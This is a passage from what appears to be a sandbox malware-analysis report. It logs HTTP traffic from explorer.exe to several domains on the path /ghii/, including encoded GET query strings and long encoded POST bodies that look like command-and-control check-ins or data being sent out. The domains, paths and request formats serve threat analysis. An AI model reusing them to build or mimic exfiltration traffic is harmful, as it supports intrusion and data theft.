                                                                                            Feb 18, 2023 13:08:21.910377026 CET320OUTGET /ghii/?Y5=bNlPHlhETrwE0CBUTa4Ov0f9IitGRas8007S+k/uRSIn2M4XJq0O4GAgtFn3DdbLFzy6ewAkUq9t07yJukgh3h16R0bz/1ZGgA==&9WI6t=QaRcz HTTP/1.1
                                                                                            Host: www.yeah-go.com
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            Feb 18, 2023 13:08:21.949246883 CET321INHTTP/1.1 403 Forbidden
                                                                                            Date: Sat, 18 Feb 2023 12:08:21 GMT
                                                                                            Content-Type: text/html
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Vary: Accept-Encoding
                                                                                            X-Sorting-Hat-PodId: -1
                                                                                            X-Dc: gcp-europe-west3
                                                                                            X-Request-ID: 2ba198b6-bacf-4025-8030-069259cd3262
                                                                                            X-XSS-Protection: 1; mode=block
                                                                                            X-Download-Options: noopen
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-Permitted-Cross-Domain-Policies: none
                                                                                            CF-Cache-Status: DYNAMIC
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FFaUaCVVl1ME8whv3ahSS9Z2%2FZthmAIBWsb9HukJ9%2BO5vr1fImMhHJvwitoHt6iNRyN6uAHzJx%2FyNyaxX08X%2BvMp6ud0bPTs3a6c7yxQN%2FdlHCEhjPCufIwRlmEsebvh3Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                            Server-Timing: cfRequestDuration;dur=20.999908
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 79b6a5d0fc462c41-FRA
                                                                                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                            Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69
                                                                                            Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margi
                                                                                            Feb 18, 2023 13:08:21.949378967 CET323INData Raw: 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61
                                                                                            Data Ascii: n:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{
                                                                                            Feb 18, 2023 13:08:21.949445963 CET324INData Raw: 6c 6c 61 74 65 6c 73 65 20 74 69 6c 20 c3 a5 20 c3 a5 70 6e 65 20 64 65 74 74 65 20 6e 65 74 74 73 74 65 64 65 74 22 0a 20 20 7d 2c 0a 20 20 22 74 68 22 3a 20 7b 0a 20 20 20 20 22 74 69 74 6c 65 22 3a 20 22 e0 b8 81 e0 b8 b2 e0 b8 a3 e0 b9 80 e0
                                                                                            Data Ascii: llatelse til pne dette nettstedet" }, "th": { "title": "", "content-title": "
                                                                                            Feb 18, 2023 13:08:21.949508905 CET325INData Raw: 6f 6e 65 20 70 65 72 20 61 63 63 65 64 65 72 65 20 61 20 71 75 65 73 74 6f 20 73 69 74 6f 20 77 65 62 22 0a 20 20 7d 2c 0a 20 20 22 70 6c 22 3a 20 7b 0a 20 20 20 20 22 74 69 74 6c 65 22 3a 20 22 4f 64 6d 6f 77 61 20 64 6f 73 74 c4 99 70 75 22 2c
                                                                                            Data Ascii: one per accedere a questo sito web" }, "pl": { "title": "Odmowa dostpu", "content-title": "Nie masz uprawnie dostpu do tej strony internetowej" }, "sv": { "title": "tkomst nekad", "content-title": "Du har inte b
                                                                                            Feb 18, 2023 13:08:21.949564934 CET326INData Raw: 20 20 22 7a 68 2d 43 4e 22 3a 20 7b 0a 20 20 20 20 22 74 69 74 6c 65 22 3a 20 22 e8 ae bf e9 97 ae e8 a2 ab e6 8b 92 e7 bb 9d 22 2c 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 e6 82 a8 e6 97 a0 e6 9d 83 e8 ae bf e9 97 ae
                                                                                            Data Ascii: "zh-CN": { "title": "", "content-title": "" }, "nl": { "title": "Toegang geweigerd", "content-title": "Je hebt geen toestemming voor toegang tot deze website" }}; var language =


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            28192.168.2.34972885.159.66.9380C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Feb 18, 2023 13:08:27.093106985 CET328OUTPOST /ghii/ HTTP/1.1
                                                                                            Host: www.ixirwholesale.xyz
                                                                                            Connection: close
                                                                                            Content-Length: 184
                                                                                            Cache-Control: no-cache
                                                                                            Origin: http://www.ixirwholesale.xyz
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Accept: */*
                                                                                            Referer: http://www.ixirwholesale.xyz/ghii/
                                                                                            Accept-Language: en-US
                                                                                            Accept-Encoding: gzip, deflate
                                                                                            Data Raw: 59 35 3d 54 6c 42 56 7a 2d 46 77 41 74 61 53 75 66 44 57 63 57 69 32 47 4f 36 62 50 44 43 4e 57 59 49 35 44 52 53 51 66 6b 34 59 64 30 57 34 77 58 77 62 48 37 6f 30 52 75 67 70 34 6a 66 71 46 38 65 73 54 66 6b 31 66 68 33 34 6a 67 77 48 7e 58 4e 34 36 51 4a 5f 78 56 34 33 5a 36 72 49 71 4b 31 36 47 49 50 66 58 79 49 38 4f 64 53 75 57 4a 77 32 75 4c 72 67 73 46 70 4f 58 6b 69 57 30 74 61 58 48 74 74 4e 4d 52 72 51 34 34 4a 78 4c 52 55 4c 37 53 59 77 6d 70 71 66 36 2d 6e 6b 42 52 69 76 73 53 49 73 79 76 41 33 68 30 43 30 62 4e 71 75 56 67 29 2e 00 00 00 00 00 00 00 00
                                                                                            Data Ascii: Y5=TlBVz-FwAtaSufDWcWi2GO6bPDCNWYI5DRSQfk4Yd0W4wXwbH7o0Rugp4jfqF8esTfk1fh34jgwH~XN46QJ_xV43Z6rIqK16GIPfXyI8OdSuWJw2uLrgsFpOXkiW0taXHttNMRrQ44JxLRUL7SYwmpqf6-nkBRivsSIsyvA3h0C0bNquVg).
                                                                                            Feb 18, 2023 13:08:27.207192898 CET328INHTTP/1.1 404 Not Found
                                                                                            Server: nginx/1.14.1
                                                                                            Date: Sat, 18 Feb 2023 12:08:27 GMT
                                                                                            Content-Length: 0
                                                                                            Connection: close
                                                                                            X-Rate-Limit-Limit: 5s
                                                                                            X-Rate-Limit-Remaining: 9
                                                                                            X-Rate-Limit-Reset: 2023-02-18T12:08:32.1801576Z


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            29192.168.2.34972985.159.66.9380C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Feb 18, 2023 13:08:29.676469088 CET334OUTPOST /ghii/ HTTP/1.1
                                                                                            Host: www.ixirwholesale.xyz
                                                                                            Connection: close
                                                                                            Content-Length: 5332
                                                                                            Cache-Control: no-cache
                                                                                            Origin: http://www.ixirwholesale.xyz
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Accept: */*
                                                                                            Referer: http://www.ixirwholesale.xyz/ghii/
                                                                                            Accept-Language: en-US
                                                                                            Accept-Encoding: gzip, deflate
                                                                                            Data Raw: 59 35 3d 54 6c 42 56 7a 2d 46 77 41 74 61 53 6f 2d 54 57 66 78 57 32 41 75 36 45 41 6a 43 4e 63 34 49 6c 44 52 65 51 66 6d 55 49 63 42 4f 34 31 56 49 62 48 64 45 30 43 2d 67 70 76 7a 66 75 49 63 65 2d 54 66 77 58 66 67 48 6f 6a 6b 55 48 28 42 42 34 74 41 4a 34 75 6c 35 51 63 36 72 4c 75 4b 31 36 47 49 44 35 58 32 55 47 4f 64 36 75 58 5f 45 32 75 4a 44 68 73 56 70 4e 59 45 69 57 30 74 57 49 48 74 74 37 4d 52 7a 35 34 37 78 78 5a 53 4d 4c 35 44 59 7a 68 35 71 45 6d 75 6d 72 46 42 44 32 35 54 41 53 37 4f 63 39 67 53 58 39 65 4a 28 36 43 6d 46 43 48 66 51 67 51 75 37 54 5a 43 57 44 6f 6c 61 4d 37 52 57 47 44 4b 4b 4f 59 4a 54 41 67 48 4d 35 74 53 79 6d 38 52 4b 46 73 72 41 4f 56 67 68 70 55 34 4e 4a 38 52 54 6a 69 75 55 4f 64 56 42 78 70 75 63 51 47 57 6f 6b 59 32 6e 45 64 73 37 37 65 66 6d 2d 77 57 4d 33 6e 2d 58 44 28 57 49 31 4a 36 7e 47 34 47 51 53 61 4b 35 74 4b 41 46 50 38 74 6b 65 45 42 32 70 45 48 59 51 52 66 66 6e 59 50 6b 70 72 59 71 46 71 4a 66 75 36 38 32 77 4c 4e 45 71 70 2d 36 77 62 6f 62 45 32 61 55 74 28 49 45 44 55 4e 49 37 6e 46 42 47 44 67 78 42 65 37 4a 50 57 33 48 78 68 72 39 4b 35 63 57 66 74 62 6b 57 39 46 33 6c 39 6d 63 46 36 32 67 61 61 51 36 7a 67 79 77 51 6d 47 76 63 4c 32 4d 47 6c 69 41 4d 63 42 4f 6e 72 6f 49 4a 52 51 32 49 64 52 74 59 7a 6e 55 6d 72 64 28 6b 34 57 6c 51 72 76 71 62 73 6f 43 50 72 49 4b 54 4b 6b 55 7a 4c 66 6a 72 73 48 34 4f 68 37 6c 30 52 6c 58 43 70 50 54 45 77 41 75 32 43 47 36 4a 41 4a 62 58 61 5f 53 62 51 55 70 52 6b 6e 30 55 75 44 64 57 28 47 52 4f 71 5f 42 56 31 41 72 54 63 5a 7e 55 50 39 4b 5f 4e 37 4d 36 55 6c 4d 4f 4f 71 43 4f 63 4f 6c 4e 6f 4b 57 63 43 55 30 41 53 66 4d 52 43 4a 43 62 46 5a 53 7a 51 58 56 6e 4a 65 58 42 75 49 55 52 44 59 44 36 71 5a 6f 48 5a 6a 53 6b 61 70 52 35 47 6b 6e 62 68 59 4c 47 38 74 35 44 38 55 6f 69 34 69 64 37 4e 34 43 41 53 59 61 65 4a 62 44 6c 35 77 76 34 64 5f 5a 4f 48 34 5a 68 35 66 57 53 4c 58 6a 58 4f 44 34 56 44 46 4e 78 79 31 44 47 54 43 72 6a 78 66 62 6b 79 70 6e 31 6e 64 6f 58 67 37 38 69 6f 35 5a 4e 7a 2d 53 51 6f 65 78 5f 77 77 74 7a 77 49 4e 59 34 6e 68 63 7a 53 66 59 34 4e 73 4f 6d 5f 7e 47 61 64 4e 47 4d 64 56 31 36 78 52 38 45 51 35 37 44 4e 53 46 57 56 57 54 52 33 62 6e 68 5a 48 77 79 2d 45 6e 59 71 72 5a 56 6e 51 51 34 55 34 39 67 6d 6f 53 44 34 45 57 6c 33 6c 36 42 72 4b 77 66 31 64 69 66 73 4d 77 34 31 6c 30 6d 4a 6f 69 7a 70 47 55 62 6f 39 7a 6f 76 77 32 75 36 45 53 39 79 73 78 61 6e 48 65 54 6f 54 39 6d 46 78 6b 38 5a 49 34 4c 45 35 6b 28 46 6e 6e 6e 63 72 70 28 45 7e 7a 31 54 45 76 76 33 75 6e 75 73 63 38 4f 45 51 50 4b 4a 6a 69 4f 72 72 4d 58 61 43 56 59 68 73 4b 6d 30 55 6f 66 67 79 79 65 47 39 71 54 70 61 45 66 46 62 56 4a 78 68 6c 37 53 72 43 35 48 79 43 4a 43 66 61 6b 53 47 4c 30 37 6a 49 65 63 54 4d 42 59 6e 66 31 50 74 52 33 6a 67 47 63 53 74 32 35 67 5a 70 71 66 63 68 69 62 30 62 51 62 6e 35 67 32 39 5f 7e 59 6d 33 64 34 73 76 6d 38 73 52 4e 58 71 47 7a 68 47 31 51 72 31 70 52 46 4c 4d 4a 6f 37 6e 77 47 6e 70 6e 34 53 50 6a 61 42 39 6e 44 68 5a 42 69 7a 6e 66 32 30 44 55 73 36 68 43 39 32 4f 33 66 57 31 73 78 78 55 55 38 53 54 6c 4b 49 30 77 6e 73 43 69 32 4c 53 64 47 37 79 63 36 69 63 6c 44 51 7a 4c 48 54 35 4b 30 46 49 48 4b 65 6d 4f 6a 78 31 34 32 74 46 49 56 62 30 57 67 50 55 6a 4d 38 59 53 58 36 37 38 57 59 73 53 4b 44 38 37 77 66 6f 63 2d 66 54 64 39 5a 79 45 59 38 70 75 57 5a 6d 43 78 65 6f 74 53 62 52 70 34 64 75 58 4d 77 76 37 4b 48 56 6e 6a 68 53 30 45 4d 47 6c 4d 6c 34 57 5f 55 6a 36 34 75 61 4e 55 57 46 44 37 39 65 67 31 38 53 78 71 31 73 53 5f 64 6b 48 72 7a 52 62 2d 38 4c 73 36 49 39 6b 54 51 4d 49 4a 31 34 31 75 74 37 54 55 53 62 71 6c 54 6a 67 74 37 6f 42 6b 55 37 51 4a 6f 75 53 59 70 67 70 7a 76 47 79 36 31 76 45 30 51 4f 61 53 78 6e 53 4c 4c 65 39 46 7a 56 7e 71 78 53 66 55 4d 38 7a 68 41 44 34 32 6a 64 4a 78 6b 5a 39 6f 73 50 71 73 57 4f 34 54 56 74 75 4e 6d 5a 4a 50 76 78 64 64 4d 56 72 56 65 6c 58 67 64 64 56 67 49 34 56 38 36 67 62 5a 52 61 77 64 59 78 59 44 58 2d 57 49 59 70 7e 49 76 6b 7e 58 39 72 71 62 36 4f 78 50 4c 67 4d 4f 56 77 48 6b 6a 76 53 77 51 36 61 36 65 6c 33 32 7e 4a
                                                                                            Data Ascii: Y5=TlBVz-FwAtaSo-TWfxW2Au6EAjCNc4IlDReQfmUIcBO41VIbHdE0C-gpvzfuIce-TfwXfgHojkUH(BB4tAJ4ul5Qc6rLuK16GID5X2UGOd6uX_E2uJDhsVpNYEiW0tWIHtt7MRz547xxZSML5DYzh5qEmumrFBD25TAS7Oc9gSX9eJ(6CmFCHfQgQu7TZCWDolaM7RWGDKKOYJTAgHM5tSym8RKFsrAOVghpU4NJ8RTjiuUOdVBxpucQGWokY2nEds77efm-wWM3n-XD(WI1J6~G4GQSaK5tKAFP8tkeEB2pEHYQRffnYPkprYqFqJfu682wLNEqp-6wbobE2aUt(IEDUNI7nFBGDgxBe7JPW3Hxhr9K5cWftbkW9F3l9mcF62gaaQ6zgywQmGvcL2MGliAMcBOnroIJRQ2IdRtYznUmrd(k4WlQrvqbsoCPrIKTKkUzLfjrsH4Oh7l0RlXCpPTEwAu2CG6JAJbXa_SbQUpRkn0UuDdW(GROq_BV1ArTcZ~UP9K_N7M6UlMOOqCOcOlNoKWcCU0ASfMRCJCbFZSzQXVnJeXBuIURDYD6qZoHZjSkapR5GknbhYLG8t5D8Uoi4id7N4CASYaeJbDl5wv4d_ZOH4Zh5fWSLXjXOD4VDFNxy1DGTCrjxfbkypn1ndoXg78io5ZNz-SQoex_wwtzwINY4nhczSfY4NsOm_~GadNGMdV16xR8EQ57DNSFWVWTR3bnhZHwy-EnYqrZVnQQ4U49gmoSD4EWl3l6BrKwf1difsMw41l0mJoizpGUbo9zovw2u6ES9ysxanHeToT9mFxk8ZI4LE5k(Fnnncrp(E~z1TEvv3unusc8OEQPKJjiOrrMXaCVYhsKm0UofgyyeG9qTpaEfFbVJxhl7SrC5HyCJCfakSGL07jIecTMBYnf1PtR3jgGcSt25gZpqfchib0bQbn5g29_~Ym3d4svm8sRNXqGzhG1Qr1pRFLMJo7nwGnpn4SPjaB9nDhZBiznf20DUs6hC92O3fW1sxxUU8STlKI0wnsCi2LSdG7yc6iclDQzLHT5K0FIHKemOjx142tFIVb0WgPUjM8YSX678WYsSKD87wfoc-fTd9ZyEY8puWZmCxeotSbRp4duXMwv7KHVnjhS0EMGlMl4W_Uj64uaNUWFD79eg18Sxq1sS_dkHrzRb-8Ls6I9kTQMIJ141ut7TUSbqlTjgt7oBkU7QJouSYpgpzvGy61vE0QOaSxnSLLe9FzV~qxSfUM8zhAD42jdJxkZ9osPqsWO4TVtuNmZJPvxddMVrVelXgddVgI4V86gbZRawdYxYDX-WIYp~Ivk~X9rqb6OxPLgMOVwHkjvSwQ6a6el32~J7rUvIbBGIBDKDc6z8lQiaX2IrtFeTVPw3idmm16WernZXslSDJYWDDxa9qLeQNMSUTRcosD5F4skh1HEQLpQb6m6q1UXqhOnAxH3AXyF5xiMKbV001Va1rDClmavDNFbj14_HR6_dVgQdaj0u1Lj3RE5P027GfaekAvSt0FDMYzfpD~UU2BiKC(DRSp9lp9uhKM9ikzAweggRJDaGZ(CcIBYSXsVKxmCB3plrKSKQ0zXZjHo6Dj9OAynQx(fh9c61oGl~N8fNmqhnz0h0Al7tjczv_ZoEPfbuoOzYWFEqOFmDH(4N7g8a01xnIwfbvIPJLeycYKpBDD_rDDRq536zKF7C8yZDpKAMvq0gQCTJsMD0eoTgEIVbOOjhb2r57LjEG(OU5wXYZnQf-HmFrUl9lmb6IwSkIcVzKcQsxin9mSCRuHMmPaeuTHct-j4r4i9vksp3QncWDMsymdTonmAIfL9rLIXUpaTpXuaUwxHjEgFIe8n29tB1oDMguzntvfKr1ox9QU_1HXsy2r2S5phayYf3cYi2hnA3HKk6ASPy3HMRXM_tQaslckmdMqb(6cPOCWRAX9bcZcQMD4dMvn-WievinXnJuEmj5lptKPUWqOZTVo8p8vEiQuiSV53ByoITitUkRBdvNyWDEG10dKjRD2Bxun896~Mbuaxt85Ss5FYjVLnYjI2OTQB6qT91S616CDyeLjUW03sbbAq36ks~itHX68z1xh2ayPFLbo-zzRjbSfGgdeVmrnu6FFbwZHZ(aD6xfDSsL6dFJIBaMnTOHNVZXLjDX61MErVOPoeALRXKYePja3yvUu6JsgnmDO5nVNtVwkSymc51lYod6wR~_zsJhbo8Rp23fHAYchWNoeE38GAbFqSYpztRKXF(ykQ0G6Prgc8a5MHaCVSOFpz1f1TdofCWSTWj-M2KahMgoOAhOYCX6v3Ta6l9_8mBjjW1IsccF3ikGfvYheiSzmPtsrrO79dxQnC0kjz9djA4AsAdzESfYDAdp6SDQ7D4UV-L6yhTxgOosGM~NzR7pLqE4Yh9LvtveLt1zjmFfQ47BRkjevaPv8BFWZ-LogczqCLanQ4REowbDsKEhWhtDz-e-IDceMayecJiuBWoHUWiy5uaFbeXDsd2CUDSqE4PUpgRG1ZWUEDS1UJx6OC31~b9xDvYJGiXYZa4Ppn7t(xkzlJ6jur(-D2mE76nMmY(dPuzjabVRNWo3(X5pHjj3FQijyYkRURihSVLElw6MJJilvGlX0MVVnDnZIB(JsIRKnvi9Tvy7pGmk9NxkE57J6dpuh2nIMvGH81ugMFdkOo2f5zooOH1GpmQDzqSaOaQvN-7Y2a09ZzQ4w4N3dP1n86zuOQfTYZTpQnINxstZYIVfGedBNlFiA_UMNNyudvDxrALwdDtaf7c12uSoLQ9U0uV-oE7NM1ZLXwkleDR0Xf4j5yLkgEIGg0k5wIsndMcW7O5dsEuMQWJnuo7HAT6Oev5L4dvICxckzXYHzMolsLC9qoOiI0NKVs4E7bW8cx(Wj53UFhQ-A0L0yYGca44FeIQWGu2hi6PIid7OiTsVE067CyAxoYZXOKUB8cOsype8iCG5G3BC5DaYaMfy5MwUrn(SHWaOsFKN3a5DkcB4MX(z7r~lxZk6qNKzq5gE3ttoBSjAayr9Nf~k5u4OXw7unlEP6hChDUNdc4xA2NN_W8uhUmXygsvcQbmpt9TD7XBwEWytiKt0qjRIgIuZYBxj1Pf6bZd2yxONG_dbzC5gva3pXy57nyocp3RarySBRkWrcoaodQo46AwTGCZZZnEmYwmYt5djJeNHacGXewZzPRgYs331s3dMuh0fYq9ZeSNev5SQX_9LbawuGf18CbVWQxXLn8K0LkWXvfDLp_zH3fLtqcWXGrXBpd(UPgSuR7sKkbKIH7iPSjmydtuG~EnCTZJLZoAxtYoyna9ZYjqJA1NMeF00Z5FgC-Pb94qx7h8zW7Ad2BjOAyRJq-7r~1FFgubaPCX3lcAntG3fiLGHXEosDABJPvZ4OuhrTw~sghNto_0dBhUcLQ8ZA26QhFXv~1s6iwlIxxR4baGlJZj10Ih_JKIgzVSsi2LkXjgRPjbBuQEuQDyhcMOLWB3_mebsLJhWJno7Y9CxmAdA19PtVJM9yyc2IU7JcHKt5xpP~O8K7sH6w3bWECXuZCtkX4u9A5FFYSOE3m(uR1gjpnnm~0cfbD5hhoRAOqycFcAX~m~KF7iWlI8AqYtHFCfcCkzRi4ZZ9NtjD8XXV1N72KriqFLjZsXSUq2Wa2JMQryyovxM12NRm1eZVgU6rN7vngsynJmLU1c0PjFEqU6TqZbPaplrOTv-VXjul8XUa3NBGOvsBWxctOeADtjnzZa06hN5DB(LgCjuRoa2yHObiqUOrcYpoxgU7qvusP7Nh3XgCNMlmfm9ZPBWyD1vdovkzc8ccmKdlEdlbVbNHWqtH51liUq5PXJSJyTPdIs94o4YKrNQtNZ0N-BiI4SDSJAnJRngPaOiMbPvnHHwJnD4A0tcWp5FxVW04EZsZdCV(zbfx9Tr686EKTU34fgsa5~gQbmmcmOQH0NviimLnxMl0CFG98NXRCbmFh9Cqda9HOKRVKeMmMIsjNjRmXxb~kITHj0kYxxIQEScUtta(CXW2KR-u7ak3wDjUJrstMga0xjWLRjYeEx289DOYK7etkElyQ1iURDGgKdsPLuG4Km4V
                                                                                            Feb 18, 2023 13:08:29.872987032 CET334INHTTP/1.1 404 Not Found
                                                                                            Server: nginx/1.14.1
                                                                                            Date: Sat, 18 Feb 2023 12:08:29 GMT
                                                                                            Content-Length: 0
                                                                                            Connection: close
                                                                                            X-Rate-Limit-Limit: 5s
                                                                                            X-Rate-Limit-Remaining: 8
                                                                                            X-Rate-Limit-Reset: 2023-02-18T12:08:32.1801576Z


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            3192.168.2.349703184.94.215.9180C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Feb 18, 2023 13:06:49.331402063 CET136OUTGET /ghii/?9WI6t=QaRcz&Y5=Hsu0eFbPaPXvQj1driY9Qb+UxIEGydZDMi24Zx/KBNJzrILAD6eOCtsvvO79CgG5LYmF38wKy0LUujLv+r7tqZV/rA0yzrxWEg== HTTP/1.1
                                                                                            Host: www.energybig.xyz
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            Feb 18, 2023 13:06:49.600657940 CET137INHTTP/1.1 404 Not Found
                                                                                            Date: Sat, 18 Feb 2023 12:06:49 GMT
                                                                                            Server: Apache
                                                                                            Content-Length: 5278
                                                                                            Connection: close
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39 2e 33 63 2d 37 2e 34 36 20 30 2d 31 34 2e 37 33 2d 2e 39 34 2d 32 31 2e 38 31 2d 32 2e 38 33 2d 37 2e 30 38 2d 31 2e 38 39 2d 31 33 2e 37 36 2d 34 2e 36 2d 32 30 2e 30 34 2d 38 2e 31 34 61 38 38 2e 32 39 32 20 38 38 2e 32 39 32 20 30 20 30 20 31 2d 31 37 2e 33 35 2d 31 32 2e 38 31 63 2d 